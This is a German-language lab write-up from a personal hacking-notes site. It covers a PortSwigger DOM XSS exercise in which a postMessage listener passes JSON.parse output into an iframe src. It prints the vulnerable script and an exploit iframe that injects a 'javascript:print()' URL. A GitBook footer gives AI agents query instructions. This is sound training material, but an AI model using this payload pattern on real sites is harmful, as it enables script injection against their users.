> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/dom/xss-dom-with-web-messages-and-json-parse.md).

# DOM-XSS mit Web-Nachrichten und json.parse

### DOM XSS unter Verwendung von Web-Nachrichten und JSON.parse

Dieses Dokument formuliert die im Labor (PortSwigger) bereitgestellten Notizen neu und übersetzt sie ins Französische: Es beschreibt den verwundbaren Code, wie er Nachrichten interpretiert, und die Nutzlast, die zum Aufruf verwendet wird `print()` über eine `iframe`.

Beschreibung des verwundbaren Skripts

Das Skript erstellt dynamisch ein `iframe` Tag und wird per Nachrichten ferngesteuert, die von der `postMessage` Ereignis. Es kann eine URL laden, die Größe des Players anpassen und ihn in die Seite scrollen.

```javascript
<script>
window.addEventListener('message', function(e) {
    var iframe = document.createElement('iframe'),
        ACMEplayer = {element: iframe},
        d;

    document.body.appendChild(iframe);

    try {
        d = JSON.parse(e.data);
    } catch(e) {
        return;
    }

    switch(d.type) {
        case "page-load":
            ACMEplayer.element.scrollIntoView();
            break;

        case "load-channel":
            ACMEplayer.element.src = d.url;
            break;

        case "player-height-changed":
            ACMEplayer.element.style.width = d.width + "px";
            ACMEplayer.element.style.height = d.height + "px";
            break;
    }
}, false);
</script>
```

<figure><img src="/files/f126b5a3227c58161494f4be32577d1f34378865" alt=""><figcaption></figcaption></figure>

### `postMessage` Nachrichtenbeispiel

Das Senden einer JSON-Nachricht als Zeichenkette ermöglicht es dem Skript, die angeforderte Aktion zu interpretieren.

Eine normale URL laden:

```javascript
window.postMessage(JSON.stringify({
  type: "load-channel",
  url: "https://jord4n.pro"
}), "*");
```

<figure><img src="/files/0a92c907bfa737b70596f1d3f675c98f0d3f3f5a" alt=""><figcaption></figcaption></figure>

Verwenden Sie ein `JavaScript:` Schema, um Code auszuführen (hier aufrufen `print()`):

```javascript
window.postMessage(JSON.stringify({
  type: "load-channel",
  url: "javascript:print()"
}), "*");
```

<figure><img src="/files/f95002a6628c6cc89314c92ac65bb2aa95fab8be" alt=""><figcaption></figcaption></figure>

Auf dem Server können Sie eine HTML-Seite mit einem `iframe` veröffentlichen, der auf die verwundbare Seite zeigt, und die `load-string` Nachricht mit `URL: "JavaScript:print()"` beim Laden des Iframes.

```javascript
<iframe
  src="https://0ab900e304d6807a80b30312007a000d.web-security-academy.net/"
  width="500"
  height="500"
 onload="this.contentWindow.postMessage(JSON.stringify({type:\"load-channel\",url:\"javascript:print()\"}),\"*\"); "
</iframe>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/dom/xss-dom-with-web-messages-and-json-parse.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
